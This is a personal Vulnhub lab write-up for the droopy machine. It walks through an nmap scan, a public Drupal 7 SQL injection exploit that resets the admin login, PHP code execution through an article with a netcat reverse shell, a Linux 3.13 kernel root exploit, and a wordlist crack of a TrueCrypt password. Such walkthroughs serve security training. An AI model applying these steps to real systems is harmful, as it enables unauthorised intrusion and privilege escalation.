Vulnhub - droopy-v02,143.

This Machine is trully nice. I've saw before a drupal painel. I'm wordpress user, but i've never seen before. Let's go:

# Nmap 7.60 scan initiated Sat Feb 17 18:25:25 2018 as: nmap -sV -sC -p- -oN nmap.txt 10.0.2.6 Nmap scan report for 10.0.2.6 Host is up (0.00031s latency). Not shown: 65534 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | l'imp\xC3\xB4t que les pa... MAC Address: 08:00:27:F6:2F:97 (Oracle VirtualBox virtual NIC) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Feb 17 18:25:43 2018 -- 1 IP address (1 host up) scanned in 18.01 seconds
After that, i checked some files - and look this. We have Drupal:

You're going to know why i'm happy about this. This version is vulnerable: Drupal 7.0 < 7.31 - SQL Injection (1). Run this, and access the drupal painel:
python 34984.py http://10.0.2.6 admin admin host username password http://nope.io admin wowsecure Success! Login now with user:admin and pass:admin

After that, i discover that you can run php code in the body of article content, but before doing this you have to enable php filter - look into module tab:

After that you run this article, and run nc -lvp 4444 in your kali linux. Now you're in.

If you download this linuxpriv.py, you gonna get a lot of information - but the useful one is this: Linux droopy 3.13.0-43-generic.
searchsploit kernel | grep 3.13.0 Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14. | exploits/linux/local/37292.c Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14. | exploits/linux/local/37293.txt
Now that you're in, compile it and run it:
$./GetRootz spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library sh: 0: can't access tty; job control turned off # whoami root
Root is not enough here: George, I've updated the encrypted file... You didn't leave any hints for me. The password isn't longer than 11 characters and anyway, we know what academy we went to, don't you...? I'm sure you'll figure it out it won't rockyou too much! If you are still struggling, remember that song by The Jam Later, Dave
You're going to find this file in /root/. Its name is dave.tc. You read the email - you see rockyou, The Jam and academy as tip. I download rockyou.txt list.
Let's check for famous songs by The Jam. If you look that list, the only song that will call your attention is this The Eton Rifles. Maybe David Watts. But Eton Rifles is strong candidate.
cat rockyou.txt | grep college | awk 'length <= 11' | grep eton #NOTHING cat rockyou.txt | grep academy | awk 'length <= 11' | grep eton etonacademy ---->>>>>> YUUUUUUUUUPPPPPPPPIEEEE.
Download TrueCrypt. Install it. Run it. Add the password:

A song: